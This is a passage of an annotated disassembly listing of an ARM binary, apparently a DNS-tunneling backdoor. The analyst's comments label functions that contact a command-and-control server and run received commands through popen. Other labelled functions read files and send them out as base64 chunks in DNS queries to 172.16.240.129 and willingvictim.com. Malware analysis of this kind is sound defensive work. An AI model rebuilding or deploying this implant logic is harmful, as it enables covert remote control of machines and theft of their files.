[SP,#0x580+var_578] .text:000111B0 STR R4, [SP,#0x580+var_57C] ; number of answer resource records = 0 .text:000111B4 STR R6, [SP,#0x580+var_580] .text:000111B8 MOV R0, R9 .text:000111BC STR R5, [SP,#0x580+var_56C] .text:000111C0 MOV R3, R6 ; number of question = 1 .text:000111C4 LDR R2, =0x8180 ; flags .text:000111C8 LDR R1, =0x1337 .text:000111CC BL libnet_build_dnsv4 .text:000111D0 CMN R0, #1 .text:000111D4 BEQ printDNSErrorOnStderr .text:000111D8 ADD R2, R7, #0x14 .text:000111DC STR R4, [SP,#0x580+var_574] .text:000111E0 STMFA SP, {R4,R5} .text:000111E4 STR R4, [SP,#0x580+var_580] .text:000111E8 UXTH R2, R2 .text:000111EC MOV R3, R4 .text:000111F0 LDR R1, =0x6666 .text:000111F4 MOV R0, #0x35 .text:000111F8 BL libnet_build_udp .text:000111FC CMN R0, #1 .text:00011200 BEQ printUDPErrorOnStdErr .text:00011204 MOV R2, #0x11 .text:00011208 MOV R3, #0x40 .text:0001120C LDR R1, [SP,#0x580+var_52C] .text:00011210 ADD R0, R7, #0x28 .text:00011214 STR R1, [SP,#0x580+var_574] .text:00011218 STMFA SP, {R2,R4} .text:0001121C STR R3, [SP,#0x580+var_580] .text:00011220 UXTH R0, R0 .text:00011224 STR R4, [SP,#0x580+var_560] .text:00011228 STR R5, [SP,#0x580+var_564] ; libnet context => var_564 .text:0001122C STR R4, [SP,#0x580+var_568] .text:00011230 STR R4, [SP,#0x580+var_56C] .text:00011234 STR R10, [SP,#0x580+var_570] ; IP address of host name received in arg2 .text:00011238 MOV R3, R4 ; frag = 0 .text:0001123C MOV R2, #0xF2 ; IP identification number = 0xF2 .text:00011240 MOV R1, R4 ; tos=0 .text:00011244 BL libnet_build_ipv4 ; build an IPv4 header (..., payload_s=0xC, ...) .text:00011248 CMN R0, #1 .text:0001124C BEQ IPHeaderBuildError .text:00011250 MOV R0, R5 .text:00011254 BL libnet_write .text:00011258 MOV R0, R5 .text:0001125C BL libnet_destroy .text:00011260 MOV R0, R4 .text:00011264 ADD SP, SP, #0x550 .text:00011268 ADD SP, SP, #0xC .text:0001126C LDMFD SP!, {R4-R11,PC} .text:00011270 ; --------------------------------------------------------------------------- .text:00011270 .text:00011270 printDNSErrorOnStderr ; CODE XREF: buildAndSendDNSPacket+124j .text:00011270 LDR R3, =__bss_start ; stderr .text:00011274 MOV R0, R5 .text:00011278 LDR R4, [R3] .text:0001127C BL libnet_geterror .text:00011280 LDR R1, =aCanTBuildDnsPa ; "Can't build DNS packet: %s\n" .text:00011284 MOV R2, R0 .text:00011288 MOV R0, R4 ; stream .text:0001128C BL fprintf .text:00011290 .text:00011290 return ; CODE XREF: buildAndSendDNSPacket+218j .text:00011290 MOV R0, R5 .text:00011294 BL libnet_destroy .text:00011298 MOV R0, #1 .text:0001129C ADD SP, SP, #0x550 .text:000112A0 ADD SP, SP, #0xC .text:000112A4 LDMFD SP!, {R4-R11,PC} .text:000112A8 ; --------------------------------------------------------------------------- .text:000112A8 .text:000112A8 printUDPErrorOnStdErr ; CODE XREF: buildAndSendDNSPacket+150j .text:000112A8 LDR R3, =__bss_start ; stderr .text:000112AC MOV R0, R5 .text:000112B0 LDR R4, [R3] .text:000112B4 BL libnet_geterror .text:000112B8 LDR R1, =aCanTBuildUdpHe ; "Can't build UDP header: %s\n" .text:000112BC MOV R2, R0 .text:000112C0 MOV R0, R4 ; stream .text:000112C4 BL fprintf .text:000112C8 B return .text:000112CC ; --------------------------------------------------------------------------- .text:000112CC .text:000112CC errorLibnet_init ; CODE XREF: buildAndSendDNSPacket+2Cj .text:000112CC LDR R3, =__bss_start ; stderr .text:000112D0 ADD R2, SP, #0x580+var_528 .text:000112D4 LDR R0, [R3] ; stream .text:000112D8 LDR R1, =aLibnet_initS ; "libnet_init: %s" .text:000112DC BL fprintf .text:000112E0 MOV R0, #1 ; status .text:000112E4 BL exit .text:000112E8 ; --------------------------------------------------------------------------- .text:000112E8 .text:000112E8 IPHeaderBuildError ; CODE XREF: buildAndSendDNSPacket+19Cj .text:000112E8 LDR R3, =__bss_start ; stderr .text:000112EC MOV R0, R5 .text:000112F0 LDR R4, [R3] .text:000112F4 BL libnet_geterror .text:000112F8 LDR R1, =aCanTBuildIpHea ; "Can't build IP header: %s\n" .text:000112FC MOV R2, R0 .text:00011300 MOV R0, R4 ; stream .text:00011304 BL fprintf .text:00011308 MOV R0, R6 ; status .text:0001130C BL exit .text:0001130C ; End of function buildAndSendDNSPacket .text:0001130C .text:0001130C ; --------------------------------------------------------------------------- .text:00011310 ; char *off_11310 .text:00011310 off_11310 DCD aCSCCCCCCCCCCCC ; DATA XREF: buildAndSendDNSPacket+A4r .text:00011310 ; "%c%s%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%"... .text:00011314 dword_11314 DCD 0x8180 ; DATA XREF: buildAndSendDNSPacket+114r .text:00011318 dword_11318 DCD 0x1337 ; DATA XREF: buildAndSendDNSPacket+118r .text:0001131C dword_1131C DCD 0x6666 ; DATA XREF: buildAndSendDNSPacket+140r .text:00011320 off_11320 DCD __bss_start ; DATA XREF: buildAndSendDNSPacket:printDNSErrorOnStderrr .text:00011320 ; buildAndSendDNSPacket:printUDPErrorOnStdErrr ... .text:00011324 ; char *off_11324 .text:00011324 off_11324 DCD aCanTBuildDnsPa ; DATA XREF: buildAndSendDNSPacket+1D0r .text:00011324 ; "Can't build DNS packet: %s\n" .text:00011328 ; char *off_11328 .text:00011328 off_11328 DCD aCanTBuildUdpHe ; DATA XREF: buildAndSendDNSPacket+208r .text:00011328 ; "Can't build UDP header: %s\n" .text:0001132C ; char *off_1132C .text:0001132C off_1132C DCD aLibnet_initS ; DATA XREF: buildAndSendDNSPacket+228r .text:0001132C ; "libnet_init: %s" .text:00011330 ; char *off_11330 .text:00011330 off_11330 DCD aCanTBuildIpHea ; DATA XREF: buildAndSendDNSPacket+248r .text:00011330 ; "Can't build IP header: %s\n" .text:00011334 .text:00011334 ; =============== S U B R O U T I N E ======================================= .text:00011334 .text:00011334 .text:00011334 sub_11334 ; CODE XREF: base64_decode+10p .text:00011334 STMFD SP!, {R4,LR} .text:00011338 MOV R4, R0 .text:0001133C BL strlen .text:00011340 ADD R3, R4, R0 .text:00011344 LDRB R2, [R3,#-1] .text:00011348 CMP R2, #0x3D ; '=' .text:0001134C MOVNE R3, #0 .text:00011350 BEQ loc_11360 .text:00011354 .text:00011354 loc_11354 ; CODE XREF: sub_11334+3Cj .text:00011354 ADD R0, R0, R0,LSL#1 .text:00011358 RSB R0, R3, R0,LSR#2 .text:0001135C LDMFD SP!, {R4,PC} .text:00011360 ; --------------------------------------------------------------------------- .text:00011360 .text:00011360 loc_11360 ; CODE XREF: sub_11334+1Cj .text:00011360 LDRB R3, [R3,#-2] .text:00011364 CMP R3, #0x3D ; '=' .text:00011368 MOVEQ R3, #2 .text:0001136C MOVNE R3, #1 .text:00011370 B loc_11354 .text:00011370 ; End of function sub_11334 .text:00011370 .text:00011374 .text:00011374 ; =============== S U B R O U T I N E ======================================= .text:00011374 .text:00011374 .text:00011374 base64_decode ; CODE XREF: init_session_with_C2_server+24p .text:00011374 ; InterpretAndExecuteCommand+38p .text:00011374 STMFD SP!, {R4-R8,LR} .text:00011378 MOV R6, R1 .text:0001137C MOV R8, R2 .text:00011380 MOV R7, R0 .text:00011384 BL sub_11334 .text:00011388 MOV R4, R0 .text:0001138C ADD R0, R0, #1 ; size .text:00011390 BL malloc .text:00011394 MOV R2, #0 .text:00011398 MOV R3, R0 .text:0001139C MOV R1, #0xFFFFFFFF .text:000113A0 STRB R2, [R3,R4] .text:000113A4 STR R0, [R6] .text:000113A8 MOV R0, R7 .text:000113AC BL BIO_new_mem_buf .text:000113B0 MOV R5, R0 .text:000113B4 BL BIO_f_base64 .text:000113B8 BL BIO_new .text:000113BC MOV R1, R5 .text:000113C0 BL BIO_push .text:000113C4 MOV R1, #0x100 .text:000113C8 MOV R5, R0 .text:000113CC BL BIO_set_flags .text:000113D0 MOV R0, R7 ; s .text:000113D4 BL strlen .text:000113D8 LDR R1, [R6] .text:000113DC MOV R2, R0 .text:000113E0 MOV R0, R5 .text:000113E4 BL BIO_read .text:000113E8 CMP R4, R0 .text:000113EC STR R0, [R8] .text:000113F0 BEQ return .text:000113F4 LDR R3, =aBase64decode ; "Base64Decode" .text:000113F8 LDR R2, =0x1CB ; line .text:000113FC LDR R1, =aClient_c ; "client.c" .text:00011400 LDR R0, =aLengthDecodele ; "*length == decodeLen" .text:00011404 BL __assert_fail .text:00011408 ; --------------------------------------------------------------------------- .text:00011408 .text:00011408 return ; CODE XREF: base64_decode+7Cj .text:00011408 MOV R0, R5 .text:0001140C BL BIO_free_all .text:00011410 MOV R0, #0 .text:00011414 LDMFD SP!, {R4-R8,PC} .text:00011414 ; End of function base64_decode .text:00011414 .text:00011414 ; --------------------------------------------------------------------------- .text:00011418 ; char *function .text:00011418 function DCD aBase64decode ; DATA XREF: base64_decode+80r .text:00011418 ; "Base64Decode" .text:0001141C ; unsigned int line .text:0001141C line DCD 0x1CB ; DATA XREF: base64_decode+84r .text:00011420 ; char *file .text:00011420 file DCD aClient_c ; DATA XREF: base64_decode+88r .text:00011420 ; "client.c" .text:00011424 ; char *assertion .text:00011424 assertion DCD aLengthDecodele ; DATA XREF: base64_decode+8Cr .text:00011424 ; "*length == decodeLen" .text:00011428 .text:00011428 .text:00011428 .text:00011428 ;************************************************************ .text:00011428 ;* init_session_with_C2_server * .text:00011428 ;************************************************************ .text:00011428 ;* DESCRIPTION : send a DNS request with name * .text:00011428 ;* "check.willingvictim.com" to resolve and * .text:00011428 ;* check that answer is "HELLO:" command. * .text:00011428 ;* * .text:00011428 ;* INPUT : * .text:00011428 ;* R0 = buffer for answer * .text:00011428 ;* * .text:00011428 ;* RETURN : R0=1 if OK, -1 if not. * .text:00011428 ;************************************************************ .text:00011428 .text:00011428 .text:00011428 ; =============== S U B R O U T I N E ======================================= .text:00011428 .text:00011428 .text:00011428 init_session_with_C2_server ; CODE XREF: mainLoop+24p .text:00011428 .text:00011428 var_10 = -0x10 .text:00011428 var_C = -0xC .text:00011428 .text:00011428 STMFD SP!, {R4,LR} .text:0001142C MOV R4, R0 .text:00011430 LDR R3, =aHello ; "HELLO:" .text:00011434 SUB SP, SP, #8 .text:00011438 LDR R1, [R3,#(dword_21E78 - 0x21E54)] ; "check.willingvictim.com" .text:0001143C BL send_packet_to_C_C ; send message to C&C server .text:00011440 MOV R0, R4 .text:00011444 ADD R2, SP, #0x10+var_C .text:00011448 MOV R1, SP .text:0001144C BL base64_decode ; decode answer .text:00011450 LDR R3, [SP,#0x10+var_C] .text:00011454 CMP R3, #0 .text:00011458 BEQ error .text:0001145C LDR R0, [SP,#0x10+var_10] .text:00011460 BL getCommandID ; interpret and execute command received .text:00011464 CMP R0, #1 .text:00011468 BNE unknown_command .text:0001146C .text:0001146C return ; CODE XREF: init_session_with_C2_server+58j .text:0001146C ; init_session_with_C2_server+60j .text:0001146C ADD SP, SP, #8 .text:00011470 LDMFD SP!, {R4,PC} .text:00011474 ; --------------------------------------------------------------------------- .text:00011474 .text:00011474 unknown_command ; CODE XREF: init_session_with_C2_server+40j .text:00011474 LDR R0, =aControlServerP ; "\nControl server protocol mistmatch." .text:00011478 BL printf .text:0001147C MOV R0, #0xFFFFFFFF .text:00011480 B return .text:00011484 ; --------------------------------------------------------------------------- .text:00011484 .text:00011484 error ; CODE XREF: init_session_with_C2_server+30j .text:00011484 MOV R0, #0xFFFFFFFF .text:00011488 B return .text:00011488 ; End of function init_session_with_C2_server .text:00011488 .text:00011488 ; --------------------------------------------------------------------------- .text:0001148C off_1148C DCD aHello ; DATA XREF: init_session_with_C2_server+8r .text:0001148C ; "HELLO:" .text:00011490 ; char *off_11490 .text:00011490 off_11490 DCD aControlServerP ; DATA XREF: init_session_with_C2_server:unknown_commandr .text:00011490 ; "\nControl server protocol mistmatch." .text:00011494 ; https://www.openssl.org/docs/manmaster/crypto/ .text:00011494 .text:00011494 ; =============== S U B R O U T I N E ======================================= .text:00011494 .text:00011494 .text:00011494 base64_encode ; CODE XREF: sendShortReplyTo_C2_Server+Cp .text:00011494 ; sendLargeReplyTo_C2_server+64p .text:00011494 .text:00011494 var_1C = -0x1C .text:00011494 .text:00011494 STMFD SP!, {R4-R8,LR} .text:00011498 SUB SP, SP, #8 .text:0001149C MOV R8, R2 .text:000114A0 MOV R6, R1 .text:000114A4 MOV R5, R0 ; put buffer address in R5 .text:000114A8 BL BIO_f_base64 ; get the BIO_f_base64 method .text:000114AC BL BIO_new ; get a new BIO .text:000114B0 MOV R4, R0 .text:000114B4 BL BIO_s_mem ; get the memory BIO function .text:000114B8 BL BIO_new .text:000114BC MOV R1, R0 .text:000114C0 MOV R0, R4 .text:000114C4 BL BIO_push ; append the memory BIO .text:000114C8 MOV R4, R0 .text:000114CC MOV R1, #0x100 .text:000114D0 BL BIO_set_flags .text:000114D4 MOV R2, R6 .text:000114D8 MOV R1, R5 .text:000114DC MOV R0, R4 .text:000114E0 BL BIO_write ; write buffer to BIO .text:000114E4 MOV R3, #0 .text:000114E8 MOV R0, R4 .text:000114EC MOV R2, R3 .text:000114F0 MOV R1, #0xB ; cmd BIO_CTRL_FLUSH ? .text:000114F4 BL BIO_ctrl .text:000114F8 ADD R3, SP, #0x20+var_1C .text:000114FC MOV R0, R4 .text:00011500 MOV R2, #0 .text:00011504 MOV R1, #0x73 ; cmd BIO_C_GET_BUF_MEM_PTR ? .text:00011508 BL BIO_ctrl .text:0001150C MOV R3, #0 .text:00011510 MOV R1, #9 ; cmd BIO_CTRL_SET_CLOSE ? .text:00011514 MOV R2, R3 .text:00011518 MOV R0, R4 .text:0001151C BL BIO_ctrl .text:00011520 LDR R5, [SP,#0x20+var_1C] .text:00011524 MOV R6, #0 .text:00011528 LDR R7, [R5] .text:0001152C ADD R0, R7, #1 ; size .text:00011530 BL malloc .text:00011534 STR R0, [R8] .text:00011538 MOV R2, R7 ; n .text:0001153C LDR R1, [R5,#4] ; src .text:00011540 BL memcpy .text:00011544 MOV R3, R0 .text:00011548 LDR R2, [R5] .text:0001154C MOV R0, R4 .text:00011550 STRB R6, [R3,R2] .text:00011554 BL BIO_free_all .text:00011558 MOV R0, R6 .text:0001155C ADD SP, SP, #8 .text:00011560 LDMFD SP!, {R4-R8,PC} .text:00011560 ; End of function base64_encode .text:00011560 .text:00011564 .text:00011564 .text:00011564 ;************************************************************* .text:00011564 ;* sendShortReplyTo_C2_Server * .text:00011564 ;************************************************************* .text:00011564 ;* DESCRIPTION : send a reply to the C&C Server, with a DNS * .text:00011564 ;* request to solve 'reply.willingvictim.com'. * .text:00011564 ;* * .text:00011564 ;* INPUT : * .text:00011564 ;* R0 = string to send * .text:00011564 ;* R1 = size of the string * .text:00011564 ;* * .text:00011564 ;* OUTPUT : * .text:00011564 ;* * .text:00011564 ;* RETURN : * .text:00011564 ;************************************************************* .text:00011564 .text:00011564 .text:00011564 ; =============== S U B R O U T I N E ======================================= .text:00011564 .text:00011564 .text:00011564 sendShortReplyTo_C2_Server ; CODE XREF: EXEC_command+40p .text:00011564 ; EXEC_command+90p ... .text:00011564 .text:00011564 var_C = -0xC .text:00011564 var_4 = -4 .text:00011564 .text:00011564 STR LR, [SP,#var_4]! .text:00011568 SUB SP, SP, #0xC .text:0001156C ADD R2, SP, #0x10+var_C .text:00011570 BL base64_encode .text:00011574 LDR R3, =aHello ; "HELLO:" .text:00011578 LDR R0, [SP,#0x10+var_C] .text:0001157C LDR R2, [R3,#(dword_21E7C - 0x21E54)] ; 'reply.willingvictim.com' .text:00011580 LDR R1, [R3,#(dword_21E74 - 0x21E54)] ; '172.16.240.129' .text:00011584 BL buildAndSendDNSPacket ; buildAndSendDNSPacket ( , "172.16.240.129", "reply.willingvictim.com" ); .text:00011588 ADD SP, SP, #0xC .text:0001158C LDR PC, [SP+4+var_4],#4 .text:0001158C ; End of function sendShortReplyTo_C2_Server .text:0001158C .text:0001158C ; --------------------------------------------------------------------------- .text:00011590 off_11590 DCD aHello ; DATA XREF: sendShortReplyTo_C2_Server+10r .text:00011590 ; "HELLO:" .text:00011594 .text:00011594 .text:00011594 ;************************************************************* .text:00011594 ;* sendLargeReplyTo_C2_Server * .text:00011594 ;************************************************************* .text:00011594 ;* DESCRIPTION : send a reply to the C&C Server, with a DNS * .text:00011594 ;* request to solve 'reply.willingvictim.com'. * .text:00011594 ;* * .text:00011594 ;* INPUT : * .text:00011594 ;* R0 = string to send * .text:00011594 ;* R1 = size of the string * .text:00011594 ;* * .text:00011594 ;* OUTPUT : * .text:00011594 ;* * .text:00011594 ;* RETURN : * .text:00011594 ;************************************************************* .text:00011594 .text:00011594 .text:00011594 ; =============== S U B R O U T I N E ======================================= .text:00011594 .text:00011594 .text:00011594 sendLargeReplyTo_C2_server ; CODE XREF: sendLargeBufferTo_C2_server+74p .text:00011594 .text:00011594 var_1C = -0x1C .text:00011594 .text:00011594 STMFD SP!, {R4-R8,LR} .text:00011598 MOV R8, R0 .text:0001159C SUB SP, SP, #8 .text:000115A0 MOV R0, R3 ; s .text:000115A4 MOV R7, R3 .text:000115A8 MOV R6, R1 .text:000115AC MOV R5, R2 .text:000115B0 BL strlen .text:000115B4 MOV R4, R0 .text:000115B8 ADD R0, R5, R0 ; size .text:000115BC BL malloc .text:000115C0 MOV R5, R0 .text:000115C4 MOV R2, R4 ; n .text:000115C8 MOV R1, R7 ; src .text:000115CC BL memcpy .text:000115D0 MOV R2, R6 ; n .text:000115D4 MOV R1, R8 ; src .text:000115D8 ADD R0, R5, R4 ; dest .text:000115DC BL memcpy .text:000115E0 MOV R3, #0 .text:000115E4 ADD R4, R4, R6 .text:000115E8 MOV R1, R4 .text:000115EC ADD R2, SP, #0x20+var_1C .text:000115F0 STRB R3, [R5,R4] .text:000115F4 MOV R0, R5 .text:000115F8 BL base64_encode .text:000115FC LDR R3, =aHello ; "HELLO:" .text:00011600 LDR R0, [SP,#0x20+var_1C] .text:00011604 LDR R2, [R3,#(dword_21E7C - 0x21E54)] ; reply.willingvictim.com .text:00011608 LDR R1, [R3,#(dword_21E74 - 0x21E54)] ; 172.16.240.129 .text:0001160C BL buildAndSendDNSPacket .text:00011610 MOV R0, R5 ; ptr .text:00011614 ADD SP, SP, #8 .text:00011618 LDMFD SP!, {R4-R8,LR} .text:0001161C B free .text:0001161C ; End of function sendLargeReplyTo_C2_server .text:0001161C .text:0001161C ; --------------------------------------------------------------------------- .text:00011620 off_11620 DCD aHello ; DATA XREF: sendLargeReplyTo_C2_server+68r .text:00011620 ; "HELLO:" .text:00011624 ;************************************************************* .text:00011624 ;* sendLargeBufferTo_C2_server * .text:00011624 ;************************************************************* .text:00011624 ;* DESCRIPTION : send a large buffer to C&C server, cuting * .text:00011624 ;* int in short DNS requests. * .text:00011624 ;* * .text:00011624 ;* INPUT : * .text:00011624 ;* R0 = buffer to send * .text:00011624 ;* R1 = size of buffer * .text:00011624 ;* * .text:00011624 ;* OUTPUT: * .text:00011624 ;* * .text:00011624 ;* RETURN: * .text:00011624 ;************************************************************* .text:00011624 .text:00011624 ; =============== S U B R O U T I N E ======================================= .text:00011624 .text:00011624 .text:00011624 sendLargeBufferTo_C2_server ; CODE XREF: EXEC_command+5Cp .text:00011624 ; FILE_command+120p .text:00011624 LDR R3, =0xB21642C9 .text:00011628 STMFD SP!, {R4-R10,LR} .text:0001162C SMULL R12, R3, R3, R1 .text:00011630 MOV R6, R1,ASR#31 .text:00011634 ADD R3, R3, R1 .text:00011638 RSBS R6, R6, R3,ASR#7 .text:0001163C BEQ loc_116C4 .text:00011640 MOV R3, #0xB8 .text:00011644 MUL R3, R3, R6 .text:00011648 CMP R1, R3 .text:0001164C ADDNE R6, R6, #1 .text:00011650 CMP R6, #0 .text:00011654 BLE another_return .text:00011658 .text:00011658 loc_11658 ; CODE XREF: sendLargeBufferTo_C2_server+A4j .text:00011658 MOV R7, R2 .text:0001165C MOV R4, R1 .text:00011660 MOV R5, R0 .text:00011664 MOV R8, #0 .text:00011668 LDR R9, =dword_21EF8 .text:0001166C B next_part_please .text:00011670 ; --------------------------------------------------------------------------- .text:00011670 .text:00011670 loc_11670 ; CODE XREF: sendLargeBufferTo_C2_server+84j .text:00011670 CMP R6, R8 .text:00011674 SUB R4, R4, #0xB8 .text:00011678 ADD R5, R5, #0xB8 .text:0001167C BLE return .text:00011680 .text:00011680 next_part_please ; CODE XREF: sendLargeBufferTo_C2_server+48j .text:00011680 ; sendLargeBufferTo_C2_server+98j .text:00011680 CMP R4, #0xB8 .text:00011684 MOVCC R1, R4 .text:00011688 MOVCS R1, #0xB8 .text:0001168C MOV R0, R5 .text:00011690 MOV R3, R7 .text:00011694 MOV R2, #0xB8 .text:00011698 BL sendLargeReplyTo_C2_server .text:0001169C LDR R0, [R9] ; Sleep for 4 seconds .text:000116A0 ADD R8, R8, #1 .text:000116A4 CMP R0, #0 .text:000116A8 BEQ loc_11670 .text:000116AC BL sleep .text:000116B0 CMP R6, R8 .text:000116B4 SUB R4, R4, #0xB8 ; 184 .text:000116B8 ADD R5, R5, #0xB8 .text:000116BC BGT next_part_please .text:000116C0 .text:000116C0 return ; CODE XREF: sendLargeBufferTo_C2_server+58j .text:000116C0 LDMFD SP!, {R4-R10,PC} .text:000116C4 ; --------------------------------------------------------------------------- .text:000116C4 .text:000116C4 loc_116C4 ; CODE XREF: sendLargeBufferTo_C2_server+18j .text:000116C4 MOV R6, #1 .text:000116C8 B loc_11658 .text:000116CC ; --------------------------------------------------------------------------- .text:000116CC .text:000116CC another_return ; CODE XREF: sendLargeBufferTo_C2_server+30j .text:000116CC LDMFD SP!, {R4-R10,PC} .text:000116CC ; End of function sendLargeBufferTo_C2_server .text:000116CC .text:000116CC ; --------------------------------------------------------------------------- .text:000116D0 dword_116D0 DCD 0xB21642C9 ; DATA XREF: sendLargeBufferTo_C2_serverr .text:000116D4 off_116D4 DCD dword_21EF8 ; DATA XREF: sendLargeBufferTo_C2_server+44r .text:000116D8 .text:000116D8 ; =============== S U B R O U T I N E ======================================= .text:000116D8 .text:000116D8 .text:000116D8 EXEC_command ; CODE XREF: InterpretAndExecuteCommand+DCp .text:000116D8 STMFD SP!, {R4-R6,LR} .text:000116DC MOV R4, R1 .text:000116E0 LDR R1, =aExec ; "EXEC:" .text:000116E4 BL strstr .text:000116E8 MOV R5, R0 .text:000116EC LDR R0, =aExec ; "EXEC:" .text:000116F0 BL strlen .text:000116F4 LDR R1, =aR ; "r" .text:000116F8 ADD R0, R5, R0 ; command .text:000116FC BL popen ; ================> Execute asked cmdline .text:00011700 SUBS R5, R0, #0 .text:00011704 BEQ loc_11774 .text:00011708 LDR R0, =aExecStart_stat ; "EXEC:START_STATE" .text:0001170C BL strlen .text:00011710 MOV R1, R0 .text:00011714 LDR R0, =aExecStart_stat ; "EXEC:START_STATE" .text:00011718 BL sendShortReplyTo_C2_Server .text:0001171C B getCommandToExec .text:00011720 ; --------------------------------------------------------------------------- .text:00011720 .text:00011720 execCmdLine ; CODE XREF: EXEC_command+74j .text:00011720 MOV R0, R4 ; s .text:00011724 BL strlen .text:00011728 LDR R2, =aExec ; "EXEC:" .text:0001172C MOV R1, R0 .text:00011730 MOV R0, R4 .text:00011734 BL sendLargeBufferTo_C2_server .text:00011738 .text:00011738 getCommandToExec ; CODE XREF: EXEC_command+44j .text:00011738 MOV R2, R5 ; stream .text:0001173C LDR R1, =0x7FF ; n .text:00011740 MOV R0, R4 ; s .text:00011744 BL fgets .text:00011748 CMP R0, #0 .text:0001174C BNE execCmdLine .text:00011750 MOV R0, R5 ; stream .text:00011754 BL pclose .text:00011758 LDR R0, =aExecStop_state ; "EXEC:STOP_STATE" .text:0001175C BL strlen .text:00011760 MOV R1, R0 .text:00011764 LDR R0, =aExecStop_state ; "EXEC:STOP_STATE" .text:00011768 BL sendShortReplyTo_C2_Server .text:0001176C MOV R0, #1 .text:00011770 LDMFD SP!, {R4-R6,PC} .text:00011774 ; --------------------------------------------------------------------------- .text:00011774 .text:00011774 loc_11774 ; CODE XREF: EXEC_command+2Cj .text:00011774 MOV R0, #0xFFFFFFFF .text:00011778 LDMFD SP!, {R4-R6,PC} .text:00011778 ; End of function EXEC_command .text:00011778 .text:00011778 ; --------------------------------------------------------------------------- .text:0001177C ; char *s .text:0001177C s DCD aExec ; DATA XREF: EXEC_command+8r .text:0001177C ; EXEC_command+14r ... .text:0001177C ; "EXEC:" .text:00011780 ; char *modes .text:00011780 modes DCD aR ; DATA XREF: EXEC_command+1Cr .text:00011780 ; "r" .text:00011784 ; char *off_11784 .text:00011784 off_11784 DCD aExecStart_stat ; DATA XREF: EXEC_command+30r .text:00011784 ; EXEC_command+3Cr .text:00011784 ; "EXEC:START_STATE" .text:00011788 ; int n .text:00011788 n DCD 0x7FF ; DATA XREF: EXEC_command+64r .text:0001178C ; char *off_1178C .text:0001178C off_1178C DCD aExecStop_state ; DATA XREF: EXEC_command+80r .text:0001178C ; EXEC_command+8Cr .text:0001178C ; "EXEC:STOP_STATE" .text:00011790 .text:00011790 ; =============== S U B R O U T I N E ======================================= .text:00011790 .text:00011790 .text:00011790 FILE_command ; CODE XREF: InterpretAndExecuteCommand+9Cp .text:00011790 STMFD SP!, {R4-R8,LR} .text:00011794 LDR R1, =aFile ; "FILE:" .text:00011798 BL strstr .text:0001179C MOV R4, R0 .text:000117A0 LDR R0, =aFile ; "FILE:" .text:000117A4 BL strlen .text:000117A8 ADD R4, R4, R0 .text:000117AC MOV R0, R4 ; s .text:000117B0 BL strlen .text:000117B4 .text:000117B4 ; Get the file size .text:000117B4 MOV R6, #0 .text:000117B8 ADD R0, R4, R0 .text:000117BC STRB R6, [R0,#-1] .text:000117C0 LDR R1, =aR ; "r" .text:000117C4 MOV R0, R4 ; filename .text:000117C8 BL fopen .text:000117CC SUBS R5, R0, #0 .text:000117D0 BEQ loc_118FC .text:000117D4 MOV R1, R6 ; off .text:000117D8 MOV R2, #2 ; whence .text:000117DC BL fseek .text:000117E0 SUBS R6, R0, #0 .text:000117E4 BNE loc_11844 .text:000117E8 MOV R0, R5 ; stream .text:000117EC BL ftell .text:000117F0 .text:000117F0 ; Allocate a buffer to read file content .text:000117F0 CMN R0, #1 .text:000117F4 MOV R8, R0 .text:000117F8 BEQ loc_118FC .text:000117FC ADD R0, R0, #1 ; size .text:00011800 BL malloc .text:00011804 MOV R2, R6 ; whence .text:00011808 MOV R1, R6 ; off .text:0001180C MOV R7, R0 .text:00011810 MOV R0, R5 ; stream .text:00011814 BL fseek .text:00011818 SUBS R6, R0, #0 .text:0001181C BNE loc_118FC .text:00011820 .text:00011820 ; Read file content .text:00011820 MOV R3, R5 ; stream .text:00011824 MOV R2, R8 ; n .text:00011828 MOV R1, #1 ; size .text:0001182C MOV R0, R7 ; ptr .text:00011830 BL fread .text:00011834 CMP R0, #0 .text:00011838 ADDNE R0, R7, R0 .text:0001183C STRNEB R6, [R0,#1] .text:00011840 BEQ loc_118E0 .text:00011844 .text:00011844 loc_11844 ; CODE XREF: FILE_command+54j .text:00011844 ; FILE_command+168j .text:00011844 MOV R0, R5 ; stream .text:00011848 BL fclose .text:0001184C MOV R0, R4 ; s .text:00011850 BL strlen .text:00011854 MOV R5, R0 .text:00011858 LDR R0, =aFileStart_stat ; "FILE:START_STATE,NAME=" .text:0001185C BL strlen .text:00011860 ADD R5, R5, R0 .text:00011864 ADD R0, R5, #1 ; size .text:00011868 BL malloc .text:0001186C MOV R1, R5 ; maxlen .text:00011870 LDR R2, =aFileStart_stat ; "FILE:START_STATE,NAME=" .text:00011874 MOV R6, R0 .text:00011878 BL snprintf .text:0001187C LDR R0, =aFileStart_stat ; "FILE:START_STATE,NAME=" .text:00011880 BL strlen .text:00011884 RSB R1, R0, R5 .text:00011888 MOV R2, R4 ; format .text:0001188C ADD R1, R1, #1 ; maxlen .text:00011890 ADD R0, R6, R0 ; s .text:00011894 BL snprintf .text:00011898 MOV R1, R5 .text:0001189C MOV R0, R6 .text:000118A0 BL sendShortReplyTo_C2_Server .text:000118A4 LDR R2, =aFile ; "FILE:" .text:000118A8 MOV R1, R8 .text:000118AC MOV R0, R7 .text:000118B0 BL sendLargeBufferTo_C2_server .text:000118B4 LDR R0, =aFileStop_state ; "FILE:STOP_STATE" .text:000118B8 BL strlen .text:000118BC MOV R1, R0 .text:000118C0 LDR R0, =aFileStop_state ; "FILE:STOP_STATE" .text:000118C4 BL sendShortReplyTo_C2_Server .text:000118C8 MOV R0, R7 ; ptr .text:000118CC BL free .text:000118D0 MOV R0, R6 ; ptr .text:000118D4 BL free .text:000118D8 MOV R0, #1 .text:000118DC LDMFD SP!, {R4-R8,PC} .text:000118E0 ; --------------------------------------------------------------------------- .text:000118E0 .text:000118E0 loc_118E0 ; CODE XREF: FILE_command+B0j .text:000118E0 LDR R3, =__bss_start .text:000118E4 MOV R2, #0x12 ; n .text:000118E8 LDR R3, [R3] ; s .text:000118EC MOV R1, #1 ; size .text:000118F0 LDR R0, =aErrorReadingFi ; "Error reading file" .text:000118F4 BL fwrite .text:000118F8 B loc_11844 .text:000118FC ; --------------------------------------------------------------------------- .text:000118FC .text:000118FC loc_118FC ; CODE XREF: FILE_command+40j .text:000118FC ; FILE_command+68j ... .text:000118FC MOV R0, #0xFFFFFFFF .text:00011900 LDMFD SP!, {R4-R8,PC} .text:00011900 ; End of function FILE_command .text:00011900 .text:00011900 ; --------------------------------------------------------------------------- .text:00011904 ; char *off_11904 .text:00011904 off_11904 DCD aFile ; DATA XREF: FILE_command+4r .text:00011904 ; FILE_command+10r ... .text:00011904 ; "FILE:" .text:00011908 ; char 